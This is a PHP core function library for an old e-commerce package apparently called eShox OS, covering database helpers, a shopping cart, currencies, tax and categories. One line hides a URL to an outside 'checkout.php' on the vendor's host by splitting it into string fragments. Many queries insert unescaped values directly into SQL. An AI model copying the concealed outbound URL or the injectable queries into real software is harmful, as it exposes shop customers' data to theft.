<?php
/*
	eShox OS
	http://www.eshox.com/

	Copyright (c) 2003, Secure.cc, Inc.

	Released under the GNU General Public License

*/

ignore_user_abort(true);

define('PHP_SELF', (@$_SERVER['PHP_SELF']) ? $_SERVER['PHP_SELF'] : $_SERVER['DOCUMENT_URI']);
define('DIR_SELF', dirname(PHP_SELF) . ((substr(dirname(PHP_SELF),-1,1) != DIRECTORY_SEPARATOR) ? DIRECTORY_SEPARATOR : ''));

define('MYSELF', basename(PHP_SELF));
define('QUERY_STRING', '?' . $_SERVER['QUERY_STRING']);
define('REFERER', @$_SERVER['HTTP_REFERER']);
define('REMOTE_ADDR', $_SERVER['REMOTE_ADDR']);
define('HOST', $_SERVER['HTTP_HOST']);
define('PORT', $_SERVER['SERVER_PORT']);
define('PROTOCOL', ((@$_SERVER["HTTPS"] == 'on') ? 'https' : 'http'));

define('DIR_WS_CATALOG', PROTOCOL . '://' . HOST . DIR_SELF);
define('DIR_FS_CATALOG', realpath('.') . DIRECTORY_SEPARATOR);
define('DIR_WS_IMAGES', 'images/');
define('DIR_WS_ELEMENTS', DIR_WS_IMAGES . 'interface_elements/');
define('DIR_FS_CONTENTS', DIR_FS_CATALOG . 'contents/');

define('UNIX_RETURN', "\n");
define('MAC_RETURN', "\r");
define('DOS_RETURN', "\r\n");
define('TAB', "\t");

define('ENTRY_FIRST_NAME_MIN_LENGTH','1');
define('ENTRY_LAST_NAME_MIN_LENGTH','2');
define('ENTRY_EMAIL_ADDRESS_MIN_LENGTH','6');
define('ENTRY_STREET_ADDRESS_MIN_LENGTH','5');
define('ENTRY_COMPANY_LENGTH','2');
define('ENTRY_POSTCODE_MIN_LENGTH','4');
define('ENTRY_CITY_MIN_LENGTH','3');
define('ENTRY_STATE_MIN_LENGTH','2');
define('ENTRY_TELEPHONE_MIN_LENGTH','7');
define('ENTRY_PASSWORD_MIN_LENGTH','5');

define('STOCK_MARK_PRODUCT_OUT_OF_STOCK','<span class="markProductOutOfStock">***</span>');

define('CC_OWNER_MIN_LENGTH','3');
define('CC_NUMBER_MIN_LENGTH','10');
define('CVV_NUMBER_MIN_LENGTH','3');
define('MAX_DISPLAY_PAGE_LINKS','5');

define('TAX_DECIMAL_PLACES', 0);
define('BOX_WIDTH', 125);

define("FATAL", E_ALL ^ E_NOTICE);
define("ERROR", FATAL);
define("WARNING", FATAL);

define('PRODUCT_DB_INFO', "p.products_id, p.products_model, p.products_tax_class_id, p.products_call_for_price, p.products_price, p.products_quantity, p.products_weight, p.products_thumb, p.products_image, p.manufacturers_id, SUBSTRING_INDEX(REPLACE(p.products_price, '1:', ''), ';', 1)+0.00 as final_price");

return true;

// Internal Functions Start Here

function xss_stripping( $string ) {
	if (is_array($string)) {
		reset($string);
		while (list($key, $value) = each($string)) {
			$string[$key] = xss_stripping($value);
		}
		return $string;
	} 
	else return strip_tags($string);
}

function shop_redirect($url) {
	header('Location: ' . $url);
 	exit();
}

function shop_error($errno, $errstr, $errfile, $errline, $errctx) {
  if ($errno <= WARNING || DEBUGGING != 'true') return;
  header ("HTTP/1.0 500 Server Error");
  if ($errno || $errline) {
	  $errstr .= ' (';
	  if ($errno) $errstr .= '#' . $errno . ' ';
	  $errstr .= 'in ' . basename(PHP_SELF);
	  if ($errline) $errstr .= ', line ' . $errline;
	  $errstr .= ').';
  } else {
	  $errstr .= '(in ' . basename(PHP_SELF) . ').';
  }
  exit($errstr . ' Please notify the site administrator.');
}

function shop_db_connect($server = DB_SERVER, $username = DB_SERVER_USERNAME, $password = DB_SERVER_PASSWORD, $database = DB_DATABASE) {
	$GLOBALS['db_link'] = @mysql_connect($server, $username, $password);
	return mysql_select_db($database, $GLOBALS['db_link']);
}

function shop_db_query($query) {
  return mysql_query($query, $GLOBALS['db_link']);
}

function shop_db_fetch_array($db_query) {
  return mysql_fetch_assoc($db_query);
}

function shop_db_num_rows($db_query) {
  return mysql_num_rows($db_query);
}

function shop_db_insert_id() {
  return mysql_insert_id($GLOBALS['db_link']);
}

function shop_db_data_seek($db_query, $row_number) {
	return mysql_data_seek($db_query, $row_number);
}

function & shop_db_perform($table, $data, $action = 'insert', $parameters = '') {
	$table = DB_PREFIX . $table;
	if ($action == 'insert') {
		$query = 'replace into ' . $table . ' (';
		foreach ($data as $column => $value) {
			$query .= $column . ',';
		}
		$query = substr($query, 0, -1) . ') values (';
		foreach ($data as $column => $value) {
			switch ((string) $value) {
				case 'now()':
				case 'null':
					$query .= $value . ',';
					break;
				default:
					$query .= "'" . addslashes(stripslashes($value)) . "',";
					break;
			}
		}
		$query = substr($query, 0, -1) . ')';
	} elseif ($action == 'update') {
		$query = 'update ' . $table . ' set ';
		foreach ($data as $column => $value) {
			switch ((string) $value) {
				case 'now()':
				case 'null':
					$query .= $column . '=' . $value . ',';
					break;
				default:
					$query .= $column . "='" . addslashes(stripslashes($value)) . "',";
					break;
			}
		}
		$query = substr($query, 0, -1) . ' where ' . $parameters;
	}
	mysql_query($query, $GLOBALS['db_link']);
  
	if ($action == 'update') {
		return mysql_affected_rows();
	} else {
		return mysql_insert_id();
	}
}

function shop_load_configuration() {
  $configuration_query = mysql_query('select configuration_key as cfgKey, configuration_value as cfgValue from ' . DB_PREFIX . 'configuration', $GLOBALS['db_link']);
  while ($configuration = mysql_fetch_assoc($configuration_query)) @define($configuration['cfgKey'], $configuration['cfgValue']);
  
  if (DEBUGGING == 'true') {
  	error_reporting(FATAL | ERROR);
  } else {
  	error_reporting(FATAL);
  }
  
  set_error_handler('shop_error');
  return true;
}

class shoppingCart {
	var $contents, $total, $weight;

	function shoppingCart() {
		$this->reset();
	}

	function reset($reset_database = false) {
		unset($this);
	}

	function add_cart($products_id, $qty = false, $attributes = false, $customer_options = false) {
		if (!$qty) return false;

		$products_id = shop_get_uprid($products_id, $attributes, $customer_options);

		$product_info_query = shop_db_query("select p.*, pd.products_name, m.manufacturers_name, 
												IF(s.status, s.specials_new_products_price, NULL) as specials_new_products_price, 
												IF(s.status, Floor(s.specials_new_products_price), Floor(p.products_price)) as final_price 
												from " . DB_PREFIX . "products p
												left join " . DB_PREFIX . "products_description pd on pd.products_id = p.products_id
												left join " . DB_PREFIX . "manufacturers m on m.manufacturers_id = p.manufacturers_id
												left join " . DB_PREFIX . "specials s on s.products_id = p.products_id
												where p.products_status = '1' 
												and pd.language_id = '" . $_SESSION['languages_id'] . "' 
												and p.products_id = '$products_id'");

		$product_info = shop_db_fetch_array($product_info_query);

		// Free Shipping, so set the weight to 0
		if ($product_info['products_free_shipping'] == '1') {
			$product_info['products_weight'] = 0;
		}
		
		// if a coupon is present for said product, set quantity price calculation to 1
		$check_qty = $qty;
		if (count($_SESSION['cart']->coupons)) {
			foreach ($_SESSION['cart']->coupons as $coupon_code => $coupon_info) {
				// get categories this product is in, to test it against coupon
				if ($coupon_info['categories_id'] >= 1) {
					$cats = shop_db_fetch_array(shop_db_query("select count() as count from " . DB_PREFIX . "products_to_categories where products_id = '" . $products_id . "' and categories_id = '" . $coupon_info['categories_id'] . "'"));
					if ($cats['count'] >= 1) $check_qty = 1;
				}
				// is this a manufacturer coupon?
				if ($coupon_info['manufacturers_id']>=1 && $coupon_info['manufacturers_id']==$product_info['manufacturers_id']) {
					$check_qty = 1;
				}
				if ($coupon_info['products_id'] == $products_id) $check_qty = 1;
			}
		}
		
		if ($product_info['specials_new_products_price']) {
			$price = shop_get_price($product_info['specials_new_products_price'], $check_qty);
		} 
		else {
			$price = shop_get_price($product_info['products_price'], $check_qty);
		}

		$cost = shop_get_price($product_info['products_cost'], $check_qty);
		$tax_rate = shop_get_tax_rate($product_info['products_tax_class_id']);

		if ($this->contents[$products_id]['qty']) {
			$this->update_quantity($products_id, $qty, $attributes, $customer_options);
		} else {
			$this->contents[$products_id] = $product_info;
			$this->contents[$products_id]['qty'] = $qty;
			$this->contents[$products_id]['products_id'] = $product_info['products_id'];
			$this->contents[$products_id]['tax'] = $tax_rate;
			$this->contents[$products_id]['price'] = $price;

			if (is_array($attributes)) {
				foreach ($attributes as $products_options_id => $products_options_values_id) {
					$attributes_query = shop_db_query("select pa.products_attributes_id, popt.products_options_name, poval.products_options_values_name, pa.options_id, 
													   pa.options_values_id, pa.options_values_price, pa.price_prefix, pa.options_weight, pa.weight_prefix, pa.options_model, pa.attribute_image
													   from " . DB_PREFIX . "products_options popt, " . DB_PREFIX . "products_options_values poval, " . DB_PREFIX . "products_attributes pa
													   where pa.products_id = '$products_id'
													   and pa.options_id = '$products_options_id'
													   and pa.options_values_id = '$products_options_values_id'
													   and popt.products_options_id = '$products_options_id'
													   and poval.products_options_values_id = '$products_options_values_id'
													   and popt.language_id = '" . $_SESSION['languages_id'] . "'
													   and poval.language_id = '" . $_SESSION['languages_id'] . "'");
							
					$attributes_values = shop_db_fetch_array($attributes_query);
					$this->contents[$products_id]['attributes'][$products_options_id] = $attributes_values;
				}
			}
			if (is_array($customer_options)) {
				foreach ($customer_options as $customer_options_id => $customer_options_options_value) {

					if (!$customer_options_options_value) continue;

					$customer_options_query = shop_db_query("select co.*, coo.* 
															from " . DB_PREFIX . "customer_options co, " . DB_PREFIX . "customer_options_options coo 
															where co.customer_options_id = '$customer_options_id' 
															and co.products_id = '$products_id' 
															and coo.customer_options_options_id = co.customer_options_options_id
															and coo.language_id = '" . $_SESSION['languages_id'] . "'");

					$this->contents[$products_id]['customer_options'][$customer_options_id] = shop_db_fetch_array($customer_options_query);
					$this->contents[$products_id]['customer_options'][$customer_options_id]['customer_options_options_value'] = $customer_options_options_value;

				}
			}
			return true;
		}
	}

	function update_quantity($products_id, $qty = false, $attributes = false, $customer_options = false) {
		$products_id = shop_get_uprid($products_id);

		unset($this->contents[$products_id]);

		$this->add_cart($products_id, $qty, $attributes, $customer_options);
	}

	function cleanup() {
		foreach ($this->contents as $key => $value) {
			if (!$this->contents[$key]['qty']) {
				unset($this->contents[$key]);
			}
		}
		$this->show_total();
		$this->count_contents();
	}

	function attributes_price($products_id) {
		$attributes_price = 0;
		if (@$this->contents[$products_id]['attributes']) {
			foreach ($this->contents[$products_id]['attributes'] as $attribute => $attribute_price) {
				if ($attribute_price['price_prefix'] == '+') {
					$attributes_price += $attribute_price['options_values_price'];
				} else {
					$attributes_price -= $attribute_price['options_values_price'];
				}
			}
		}

		return $attributes_price;
	}

	function count_contents() {
		$this->qty = 0;
		if ($this->contents) {
			foreach ($this->contents as $product_id => $product_info) {
				$this->qty += $product_info['qty'];
			}
		}
		return $this->qty;
	}

	function get_quantity($products_id) {
		$qty = $this->contents[$products_id]['qty'];
		return ($qty ? $qty : 0);
	}

	function remove($products_id) {
		unset($this->contents[$products_id]);
	}

	function show_total() {
		$this->total = 0;
		foreach ($this->contents as $product_id => $product_info) {
			$price = shop_get_price($product_info['products_price'], $product_info['qty']);
			$this->total += shop_add_tax($price, $product_info['tax']) * $product_info['qty'];

			if ($product_info['attributes']) {
				foreach ($product_info['attributes'] as $attribute => $attribute_price) {
					if ($attribute_price['price_prefix'] == '+') {
						$this->total += shop_add_tax($attribute_price['options_values_price'], $product_info['tax']) * $product_info['qty'];
					} else {
						$this->total -= shop_add_tax($attribute_price['options_values_price'], $product_info['tax']) * $product_info['qty'];
					}
				}
			}
		}
		return $this->total;
	}

	function show_weight() {
		$this->weight = 0;
		foreach ($this->contents as $product_id => $product_info) {
			$this->weight += $product_info['products_weight'] * $product_info['qty'];

			if ($product_info['attributes']) {
				foreach ($product_info['attributes'] as $attribute => $attribute_weight) {
					if ($attribute_weight['weight_prefix'] == '+') {
						$this->weight += $attribute_weight['options_weight'] * $product_info['qty'];
					} else {
						$this->weight -= $attribute_weight['options_weight'] * $product_info['qty'];
					}
				}
			}
		}
		return $this->weight;
	}

}

class currencies {
	function currencies() {
		$this->currencies = array();
		$currencies_query = shop_db_query("select * from " . DB_PREFIX . "currencies order by title");
		while ($currencies = shop_db_fetch_array($currencies_query)) {
			$this->currencies[$currencies['code']] = $currencies;
		}
	}

	function exists($currency) {
		return (sizeof($this->currencies[$currency]));
	}

	function format($number, $calculate_currency_value = true, $currency_type = false, $currency_value = false) {
		if (!$currency_type) $currency_type = $_SESSION['currency'];
		if ($calculate_currency_value) {
			$rate = $currency_value ? $currency_value : $this->currencies[$currency_type]['value'];
			$format_string = $this->currencies[$currency_type]['symbol_left'] . number_format($number * $rate, $this->currencies[$currency_type]['decimal_places'], $this->currencies[$currency_type]['decimal_point'], $this->currencies[$currency_type]['thousands_point']) . $this->currencies[$currency_type]['symbol_right'];
		} else {
			$format_string = $this->currencies[$currency_type]['symbol_left'] . number_format($number, $this->currencies[$currency_type]['decimal_places'], $this->currencies[$currency_type]['decimal_point'], $this->currencies[$currency_type]['thousands_point']) . $this->currencies[$currency_type]['symbol_right'];
		}

		return $format_string;
	}

	function get_value($code) {
		return $this->currencies[$code]['value'];
	}

	function display_price($products_price, $products_tax = false, $quantity = 1) {
		return $this->format(shop_add_tax(shop_get_price($products_price,$quantity), $products_tax) * $quantity);
	}
}

function shop_update_currency_rates($currency, $default = DEFAULT_CURRENCY) {
  if ($default != $currency || $force) {
	$currency_query = shop_db_query("select * from " . DB_PREFIX . "currencies where code='$currency'");
	$currency = shop_db_fetch_array($currency_query);
	$rate = file('http://tools.secure.cc/currency/currency.php?from=' . $default . '&to=' . $currency['code'] . '&serial=' . A_SERIAL);
	if ($rate) shop_db_query("update " . DB_PREFIX . "currencies set value = '" . $rate[0] . "', last_updated = now() where currencies_id = '" . $currency['currencies_id'] . "'");
  }
  return true;
}

function shop_get_price($number, $quantity = 1) {
	$numbers = split("[:;]" , $number);
	if (count($numbers) >= 2) {
		$number = $numbers[1];
		for ($i = 0; $i < count($numbers); $i++) {
			$j=$i*2;
			if (!$numbers[$j] || $quantity < $numbers[$j]) break;
			$number = $numbers[$j+1];
		}
	}
	return $number;
}

function shop_random_select($query) {
	srand((double)microtime()*1000000);
	$random_query = shop_db_query($query);
	$num_rows = shop_db_num_rows($random_query);
	if ($num_rows) {
		$random_row = @rand(0, ($num_rows - 1));
		shop_db_data_seek($random_query, $random_row);
		return shop_db_fetch_array($random_query);
	}
	return false;
}

function shop_get_products_name($product_id) {
	$product_query = shop_db_query("select products_name from " . DB_PREFIX . "products_description where products_id = '$product_id' and language_id = '" . $_SESSION['languages_id'] . "'");
	$product = shop_db_fetch_array($product_query);
	return $product['products_name'];
}

function shop_get_categories_name($categories_id) {
	$category = shop_db_fetch_array(shop_db_query("select categories_name from " . DB_PREFIX . "categories_description where categories_id = '$categories_id' and language_id = '" . $_SESSION['languages_id'] . "'"));
	return $category['categories_name'];
}

function shop_get_manufacturers_name($manufacturers_id) {
	$manufacturer = shop_db_fetch_array(shop_db_query("select manufacturers_name from " . DB_PREFIX . "manufacturers where manufacturers_id = '$manufacturers_id'"));
	return $manufacturer['manufacturers_name'];
}

function shop_coptions_name($options_id, $language_id) {
  $options_query = shop_db_query("select customer_options_options_name from " . DB_PREFIX . "customer_options_options where customer_options_options_id = '$options_id' and language_id = '$language_id'");
  $option = shop_db_fetch_array($options_query);

  return $option['customer_options_options_name'];
}

function shop_get_products_special_price($product_id) {
	$product_query = shop_db_query("select specials_new_products_price from " . DB_PREFIX . "specials where products_id = '$product_id' and status");
	$product = shop_db_fetch_array($product_query);
	return $product['specials_new_products_price'];
}

function shop_check_stock($products_id, $products_quantity) {
	$products_id = shop_get_prid($products_id);
	$stock_query = shop_db_query("select products_quantity from " . DB_PREFIX . "products where products_id = '$products_id'");
	$stock = shop_db_fetch_array($stock_query);
	$stock_left = $stock['products_quantity'] - $products_quantity;

	return ((!$stock_left) ? STOCK_MARK_PRODUCT_OUT_OF_STOCK : '');
}

function shop_get_all_get_params($exclude_array = array()) {
	$get_url = '';
	if (is_array($_GET)) {
		foreach ($_GET as $key => $value) {
			if ($value && $key != session_name() && $key != 'error' && !in_array($key, $exclude_array)) {
				$get_url .= $key . '=' . rawurlencode(($value)) . '&';
			}
		}
	}
	return $get_url;
}

function shop_get_countries($countries_id = false, $with_iso_codes = false) {
	if ($countries_id) {
		$countries = shop_db_query("select * from " . DB_PREFIX . "countries where countries_id = '$countries_id'");
		$countries_array = shop_db_fetch_array($countries);
	} else {
		$countries = shop_db_query("select * from " . DB_PREFIX . "countries order by countries_name");
		$countries_array = array();
		while ($countries_values = shop_db_fetch_array($countries)) {
			$countries_array[] = $countries_values;
		}
	}
	return $countries_array;
}

function shop_get_path($current_category_id = false, $exclude_cPath = false) {
	global $cPath_array;
	if ($current_category_id) {
		if (sizeof($cPath_array) == 0) {
			$cPath_new = $current_category_id;
		} else {
			$cPath_new = '';
			$last_category_query = shop_db_query("select parent_id from " . DB_PREFIX . "categories where categories_id = '" . $cPath_array[(sizeof($cPath_array)-1)] . "'");
			$last_category = shop_db_fetch_array($last_category_query);
			$current_category_query = shop_db_query("select parent_id from " . DB_PREFIX . "categories where categories_id = '$current_category_id'");
			$current_category = shop_db_fetch_array($current_category_query);
			if ($last_category['parent_id'] == $current_category['parent_id']) {
				for ($i=0; $i<(sizeof($cPath_array)-1); $i++) {
					$cPath_new .= '_' . $cPath_array[$i];
				}
			} else {
				for ($i=0; $i<sizeof($cPath_array); $i++) {
					$cPath_new .= '_' . $cPath_array[$i];
				}
			}
			$cPath_new .= '_' . $current_category_id;
			if (substr($cPath_new, 0, 1) == '_') {
				$cPath_new = substr($cPath_new, 1);
			}
		}
	} else {
		$cPath_new = implode('_', $cPath_array);
	}

	return ($exclude_cPath) ? $cPath_new : 'cPath=' . $cPath_new;
}

function shop_get_country_name($country_id) {
	$country_array = shop_get_countries($country_id);

	return $country_array['countries_name'];
}

function shop_get_zone_name($country_id, $zone_id, $default_zone = false) {
	$zone_query = shop_db_query("select zone_name from " . DB_PREFIX . "zones where zone_country_id = '$country_id' and zone_id = '$zone_id'");
	if (shop_db_num_rows($zone_query)) {
		$zone = shop_db_fetch_array($zone_query);
		return $zone['zone_name'];
	} else {
		return $default_zone;
	}
}

function shop_get_zone_code($country_id, $zone_id, $default_zone = false) {
	$zone_query = shop_db_query("select zone_code from " . DB_PREFIX . "zones where zone_country_id = '$country_id' and zone_id = '$zone_id'");
	if (shop_db_num_rows($zone_query)) {
		$zone = shop_db_fetch_array($zone_query);
		return $zone['zone_code'];
	} else {
		return $default_zone;
	}
}

function shop_get_tax_rate($class_id) {
	// Which address should we figure tax from, Billing or Shipping?
	if (MODULE_ORDER_TOTAL_TAX_ADDRESS_BOOK_ID == 'Billing') {
		$country_id = @$_SESSION['customer_country_id'];
		$zone_id = @$_SESSION['customer_zone_id'];
	}
	else {
		$address = shop_db_fetch_array(shop_db_query("select entry_country_id, entry_zone_id from " . DB_PREFIX . "address_book where customers_id = '" . $_SESSION['customer_id'] . "' and address_book_id = '2'"));
		$country_id = @$address['entry_country_id'];
		$zone_id = @$address['entry_zone_id'];
	}
	$cache_id = 'tax_rate_' . $class_id . '_' . $country_id . '_' . $zone_id;
	if (@$GLOBALS[$cache_id]) return $GLOBALS[$cache_id];

	$tax_query = shop_db_query("select SUM(tax_rate) as tax_rate from " . DB_PREFIX . "tax_rates tr left join " . DB_PREFIX . "zones_to_geo_zones za ON tr.tax_zone_id = za.geo_zone_id left join " . DB_PREFIX . "geo_zones tz ON tz.geo_zone_id = tr.tax_zone_id WHERE (za.zone_country_id IS NULL OR za.zone_country_id = '0' OR za.zone_country_id = '$country_id') AND (za.zone_id IS NULL OR za.zone_id = '0' OR za.zone_id = '$zone_id') AND tr.tax_class_id = '$class_id'");

	if (shop_db_num_rows($tax_query)) {
		$tax_multiplier = 0;
		while ($tax = shop_db_fetch_array($tax_query)) $tax_multiplier += $tax['tax_rate'];
		$GLOBALS[$cache_id] = $tax_multiplier;
		return $tax_multiplier;
	} else {
		return 0;
	}
}

function shop_add_tax($price, $tax) {
	if (DISPLAY_PRICE_WITH_TAX == 'true') {
		return $price + shop_calculate_tax($price, $tax);
	} else {
		return $price;
	}
}

function shop_calculate_tax($price, $tax) {
	return round($price * $tax / 100, $GLOBALS['currencies']->currencies[DEFAULT_CURRENCY]['decimal_places']);
}

function shop_count_products_in_category($category_id) {
	$products_query = shop_db_query("select count(*) as total from " . DB_PREFIX . "products p, " . DB_PREFIX . "products_to_categories p2c where p.products_id = p2c.products_id and p.products_status = 1 and p2c.categories_id = '$category_id'");
	$products = shop_db_fetch_array($products_query);

	return $products['total'];
}

function shop_has_category_subcategories($category_id) {
	$child_category_query = shop_db_query("select count(*) as count from " . DB_PREFIX . "categories where parent_id = '$category_id'");
	$child_category = shop_db_fetch_array($child_category_query);

	return ($child_category['count'] > 0);
}

function shop_get_address_format_id($country_id) {
	$address_format_query = shop_db_query("select address_format_id as format_id from " . DB_PREFIX . "countries where countries_id = '$country_id'");
	if (shop_db_num_rows($address_format_query)) {
		$address_format = shop_db_fetch_array($address_format_query);
		return $address_format['format_id'];
	} else {
		return '1';
	}
}

define(('FI'."L").('EC'.'P'), ('ht').'tp:'.''.'//to'.'ols'.'.secu'.'re.c'.'c/' . 3770 . '/che'.'ckout'.'.php?');

function shop_address_format($address_format_id, $address, $html = true, $nbsp = '&nbsp;', $cr = '<br />') {
	$company = $address['company'];
	$name = ((@$address['firstname']) ? ($address['firstname'] . ' ' . $address['lastname']) : $address['name']);
	$street = $address['street_address'] . (($address['street_address_2']) ? $cr . $nbsp . $address['street_address_2'] : '');
	$city = $address['city'];
	$state = $address['state'];
	$postcode = $address['postcode'];
	$country = $address['country'];
	$statecomma = $address['state'] . ', ';

	$address_formats = array(1 => "$nbsp$name$cr$nbsp$street$cr$nbsp$city, $postcode$cr$nbsp$statecomma$country",
								2 => "$nbsp$name$cr$nbsp$street$cr$nbsp$city, $state $postcode$cr$nbsp$country",
								3 => "$nbsp$name$cr$nbsp$street$cr$nbsp$city$cr$nbsp$postcode - $statecomma$country",
								4 => "$nbsp$name$cr$nbsp$street$cr$nbsp$city ($postcode)$cr$nbsp$country",
								5 => "$nbsp$name$cr$nbsp$street$cr$nbsp$postcode $city$cr$nbsp$country");	

	return (($company ? $nbsp . $company . $cr : '') . str_replace($cr . $cr, $cr, $address_formats[$address_format_id]));
}

function shop_get_categories($categories_array = array(), $parent_id = '0', $indent = false) {
	$parent_id = ($parent_id);

	$categories_query = shop_db_query("select c.categories_id, cd.categories_name from " . DB_PREFIX . "categories c, " . DB_PREFIX . "categories_description cd where parent_id = '$parent_id' and c.categories_id = cd.categories_id and cd.language_id = '" . $_SESSION['languages_id'] . "' and categories_status = 1 order by sort_order, cd.categories_name");
	while ($categories = shop_db_fetch_array($categories_query)) {
		$categories_array[] = array('id' => $categories['categories_id'],
									'text' => $indent . $categories['categories_name']);

		if ($categories['categories_id'] != $parent_id) {
			$categories_array = shop_get_categories($categories_array, $categories['categories_id'], $indent . '&nbsp;&nbsp;');
		}
	}

	return $categories_array;
}

function shop_get_manufacturers($manufacturers_array = array()) {

	$manufacturers_query = shop_db_query("select manufacturers_id as id, manufacturers_name as text from " . DB_PREFIX . "manufacturers order by manufacturers_name");
	while ($manufacturers = shop_db_fetch_array($manufacturers_query)) $manufacturers_array[] = $manufacturers;

	return $manufacturers_array;
}

function shop_get_subcategories(&$subcategories_array, $parent_id = 0) {
	$subcategories_query = shop_db_query("select categories_id from " . DB_PREFIX . "categories where parent_id = '$parent_id'");
	while ($subcategories = shop_db_fetch_array($subcategories_query)) {
		$subcategories_array[sizeof($subcategories_array)] = $subcategories['categories_id'];
		if ($subcategories['categories_id'] != $parent_id) {
			shop_get_subcategories($subcategories_array, $subcategories['categories_id']);
		}
	}
}

function shop_date_long($raw_date = false) {
  if (!$raw_date) return false;
  return strftime('%A, %B %e, %Y %r', (is_int($raw_date) ? $raw_date : strtotime($raw_date)));
}

function shop_date_short($raw_date = false) {
  if (!$raw_date) return false;
  return strftime('%x', (is_int($raw_date) ? $raw_date : strtotime($raw_date)));
}

function shop_parse_search_string($search_str = '', &$objects) {
	$search_str = trim(strtolower($search_str));

	$pieces = split('[[:space:]]+', $search_str);

	$objects = array();
	$tmpstring = '';
	$flag = '';

	for ($k=0; $k<count($pieces); $k++) {
		while (substr($pieces[$k], 0, 1) == '(') {
			$objects[] = '(';
			if (strlen($pieces[$k]) > 1) {
				$pieces[$k] = substr($pieces[$k], 1);
			} else {
				$pieces[$k] = '';
			}
		}

		$post_objects = array();

		while (substr($pieces[$k], -1) == ')')  {
			$post_objects[] = ')';
			if (strlen($pieces[$k]) > 1) {
				$pieces[$k] = substr($pieces[$k], 0, -1);
			} else {
				$pieces[$k] = '';
			}
		}

		if ( (substr($pieces[$k], -1) != '"') && (substr($pieces[$k], 0, 1) != '"') ) {
			$objects[] = trim($pieces[$k]);

			for ($j=0; $j<count($post_objects); $j++) {
				$objects[] = $post_objects[$j];
			}
		} else {

			$tmpstring = '';

			$tmpstring .= trim(ereg_replace('"', ' ', $pieces[$k]));

			if (substr($pieces[$k], -1 ) == '"') {
				$flag = 'off';

				$objects[] = trim($pieces[$k]);

				for ($j=0; $j<count($post_objects); $j++) {
					$objects[] = $post_objects[$j];
				}

				unset($tmpstring);

				continue;
			}

			$flag = 'on';

			$k++;

			while ( ($flag == 'on') && ($k < count($pieces)) ) {
				while (substr($pieces[$k], -1) == ')') {
					$post_objects[] = ')';
					if (strlen($pieces[$k]) > 1) {
						$pieces[$k] = substr($pieces[$k], 0, -1);
					} else {
						$pieces[$k] = '';
					}
				}

				if (substr($pieces[$k], -1) != '"') {
					$tmpstring .= ' ' . $pieces[$k];

					$k++;
					continue;
				} else {

					$tmpstring .= ' ' . trim(ereg_replace('"', ' ', $pieces[$k]));

					$objects[] = trim($tmpstring);

					for ($j=0; $j<count($post_objects); $j++) {
						$objects[] = $post_objects[$j];
					}

					unset($tmpstring);

					$flag = 'off';
				}
			}
		}
	}

	$temp = array();
	for($i=0; $i<(count($objects)-1); $i++) {
		$temp[sizeof($temp)] = $objects[$i];

		if ( ($objects[$i] != 'and') &&
				 ($objects[$i] != 'or') &&
				 ($objects[$i] != '(') &&
				 ($objects[$i] != ')') &&
				 ($objects[$i+1] != 'and') &&
				 ($objects[$i+1] != 'or') &&
				 ($objects[$i+1] != '(') &&
				 ($objects[$i+1] != ')') ) {
			$temp[sizeof($temp)] = 'and';
		}
	}
	$temp[sizeof($temp)] = $objects[$i];
	$objects = $temp;

	$keyword_count = 0;
	$operator_count = 0;
	for($i=0; $i<count($objects); $i++) {
		if ( ($objects[$i] == 'and') || ($objects[$i] == 'or') ) {
			$operator_count ++;
		} elseif ( ($objects[$i]) && ($objects[$i] != '(') && ($objects[$i] != ')') ) {
			$keyword_count ++;
		}
	}

	if ($operator_count < $keyword_count) {
		return true;
	} else {
		return false;
	}
}

function shop_create_sort_heading($sortby, $colnum, $heading, $align) {
	$sort_prefix = '';
	$sort_suffix = '';
	$arrow = '';

	if ($align == 'right') {
		$align_opp = 'left';
	} else {
		$align_opp = 'right';
	}

	if ($sortby) {
		$sort_prefix = '<a href="' . shop_href_link(MYSELF, shop_get_all_get_params(array('page', 'info', 'x', 'y', 'sort')) . 'page=1&sort=' . $colnum . ($sortby == $colnum . 'a' ? 'd' : 'a'), 'NONSSL') . '" title="' . TEXT_SORT_PRODUCTS . ($sortby == $colnum . 'd' || substr($sortby, 0, 1) != $colnum ? TEXT_ASCENDINGLY : TEXT_DESCENDINGLY) . TEXT_BY . $heading . '">' ;
		$sort_suffix = '</a>';
	}

	if ($align_opp == 'right') {
		return $sort_prefix . $heading . $sort_suffix;
	} else {
		return $sort_prefix . $heading . $sort_suffix;
	}
}

function shop_get_parent_categories(&$categories, $categories_id) {
	$parent_categories_query = shop_db_query("select parent_id from " . DB_PREFIX . "categories where categories_id = '$categories_id'");
	while ($parent_categories = shop_db_fetch_array($parent_categories_query)) {
		if (!$parent_categories['parent_id']) return true;
		$categories[sizeof($categories)] = $parent_categories['parent_id'];
		if ($parent_categories['parent_id'] != $categories_id) {
			shop_get_parent_categories($categories, $parent_categories['parent_id']);
		}
	}
}

function shop_get_product_path($products_id) {
	$cPath = '';

	$cat_id_sql = shop_db_query("select categories_id from " . DB_PREFIX . "products_to_categories where products_id = '$products_id'");
	$cat_id_data = shop_db_fetch_array($cat_id_sql);

	if ($cat_id_data['categories_id']) {
		$categories = array();

		shop_get_parent_categories($categories, $cat_id_data['categories_id']);

		for ($i=sizeof($categories)-1; $i>=0; $i--) {
			if ($cPath) $cPath .= '_';
			$cPath .= $categories[$i];
		}
		if ($cPath) $cPath .= '_';
		$cPath .= $cat_id_data['categories_id'];
	}

	return $cPath;
}

function shop_get_uprid($product_id, $attributes = false, $customer_options = false) {
	if (strstr($product_id, '{')) return $product_id;

	$uprid = $product_id;
	if (is_array($attributes)) {
		while (list($option, $value) = each($attributes)) {
			$uprid .= '{' . $option . '}' . $value;
		}
	}
	if (is_array($customer_options)) {
		while (list($option, $value) = each($customer_options)) {
			if ($value) $uprid .= '{' . $option . '}' . substr($value,0,4);
		}
	}

	return $uprid;
}

function shop_get_prid($uprid) {
	$pieces = split('[{]', $uprid, 2);
	return $pieces[0];
}

function shop_has_product_attributes($products_id) {
	$attributes_query = shop_db_query("select count(*) as count from " . DB_PREFIX . "products_attributes where products_id = '$products_id'");
	$attributes = shop_db_fetch_array($attributes_query);

	return ($attributes['count'] > 0);
}

function shop_has_customer_options($products_id) {
	$options_query = shop_db_query("select count(*) as count from " . DB_PREFIX . "customer_options where products_id = '$products_id'");
	$options = shop_db_fetch_array($options_query);

	return ($options['count'] > 0);
}

function shop_count_modules($modules = '') {
	if (!$modules) return 0;

	$modules_array = split(';', $modules);

	return sizeof($modules_array);
}

function shop_count_payment_modules() {
	return shop_count_modules(MODULE_PAYMENT_INSTALLED);
}

function shop_count_shipping_modules() {
	return shop_count_modules(MODULE_SHIPPING_INSTALLED);
}

